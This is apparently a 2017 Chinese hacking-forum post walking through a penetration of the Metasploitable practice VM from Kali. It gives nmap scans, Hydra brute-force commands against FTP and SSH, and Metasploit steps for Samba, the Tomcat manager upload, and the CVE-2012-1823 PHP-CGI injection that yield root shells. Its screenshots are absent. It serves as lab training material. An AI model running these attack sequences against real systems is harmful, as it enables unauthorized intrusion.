黑帽联盟

标题: kali渗透metasploitable靶机 [打印本页]

作者: yun    时间: 2017-4-10 00:25
标题: kali渗透metasploitable靶机
扫描阶段:
工具:Nmap
隐蔽扫描      nmap  -sS 192.168.8.135
10.png


端口爆破:FTP、SSH等
工具:Hydra
备用字典
11.png



hydra -L  /root/Desktop/user.txt  -P  /root/Desktop/pass.txt  ftp://192.168.8.135
12.png



hydra -L  /root/Desktop/user.txt  -P  /root/Desktop/pass.txt  192.168.8.135 ssh
13.png

登陆系统:
14.png


端口渗透:
利用metasploit
15.png

成功获取会话,root权限
16.png



利用metasploit
17.png

反弹会话,root权限
18.png

利用telnet连接1524,直接返回root会话
19.png



利用metasploit
20.png

返回会话
22.png



先用nmap进行详细扫描
nmap -v -A -T4 192.168.8.135
23.png


Samba 3.0.20
利用metasploit
24.png

25.png

返回会话,root权限
26.png


27.png



使用use auxiliary/scanner/http/tomcat_mgr_login进行账户爆破
用默认自带的字典即可
28.png


爆破出tomcat/tomcat
使用use exploit/multi/http/tomcat_mgr_upload模块
获取meterpreter会话
29.png


30.png



msf > search cve:2012-1823
msf > use exploit/multi/http/php_cgi_arg_injection
msf exploit(php_cgi_arg_injection) > show options
msf exploit(php_cgi_arg_injection) > set rhost 192.168.8.135
rhost => 192.168.8.135
msf exploit(php_cgi_arg_injection) > run
31.png








欢迎光临 黑帽联盟 (https://bbs.cnblackhat.com/) Powered by Discuz! X2.5